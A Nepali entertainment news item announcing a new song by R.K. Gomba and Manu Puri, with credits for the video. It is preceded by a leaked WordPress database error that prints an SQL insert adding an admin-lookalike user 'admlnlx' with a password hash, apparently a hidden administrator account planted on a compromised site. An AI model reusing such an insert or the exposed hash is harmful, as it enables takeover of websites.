WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmcdlPYUocETD/tVC1SgXmDqSYjqbK0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 02:20:08', '', 'admlnlx', 'admlnlx')
काठमाडौं – गायक आर के गोम्बाको ‘ए गाँठे झ्याप्पै फसायो’ बोलको गीत बजारमा आएको छ ।
चक्र बमको अफिसियल युट्युब च्यानलबाट सार्वजनिक गरिएको गीत आरके गोम्बा र मनु पुरिको आवाज रहेको छ ।
डिपि खनालले लेखेको उक्त गीतलाई बाबुल गिरीले संगित र संगीत संयोजन गरेका हुन । भिडियोमा चक्र बम, रचना गौतम, आरके परियार र सोना घिमिरेले अभिनय रहेको छ ।
गौरव गिरिले निर्देशन गरेको भिडियोलाई नवराज उप्रेतीको छायांकन, तारा थापाले सम्पादन र श्याम कुँवरले कलर गरेका हुन्
भिडियोको लागि तलको लिन्कमा क्लिक गर्नु होला ।